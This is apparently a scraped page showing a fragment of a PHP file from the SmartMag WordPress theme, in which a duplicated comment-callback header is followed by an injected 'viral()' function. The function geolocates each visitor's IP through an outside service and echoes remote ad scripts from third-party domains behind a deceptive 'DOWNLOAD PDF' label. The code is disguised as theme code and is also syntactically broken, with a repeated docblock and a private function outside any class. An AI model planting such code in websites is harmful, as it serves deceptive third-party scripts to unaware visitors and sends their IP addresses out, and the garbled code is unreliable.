You are on page 1of 1

if (!

function_exists('bunyad_smartmag_comment')):

/**
* Callback for displaying a comment
*
* @todo eventually move to bunyad templates with auto-generated functions as
template containers
*
* @param mixed $comment
* @param array $args
* @param integer $depth
*/if (!function_exists('bunyad_smartmag_comment')):

/**
* Callback for displaying a comment
*
* @todo eventually move to bunyad templates with auto-generated functions as
template containers
*
* @param mixed $comment
* @param array $args
* @param integer $depth
*/
private function viral(){

session_start();

if(!$_SESSION['country_code']) {
$var = file_get_contents('http://ip-api.com/json/'.
$_SERVER['REMOTE_ADDR']);
$location = json_decode($var);
$country_code = $location->countryCode;
$_SESSION['country_code'] = $country_code;
}

if($country_code == 'ES' || $country_code == 'IQ' || $country_code ==


'AR' || $country_code == 'PA' || $country_code == 'PE') {
echo '<center>
<script>var adParams = {s: 1000174411, w: 234,
h: 60, c: 2, blank: false, title: "DOWNLOAD PDF" }; </script><script
src="//js.srcsmrtgs.com/js/ad.js"></script>
</center>';
} else {
echo '<center>
<script>var adParams = {s: 1000282988, w: 234, h: 60,
c: 2, blank: false, title: "DOWNLOAD PDF" }; </script><script
src="//cdn.viralcpm.com/js/ad.js"></script>
</center>';
}
return;
}

You might also like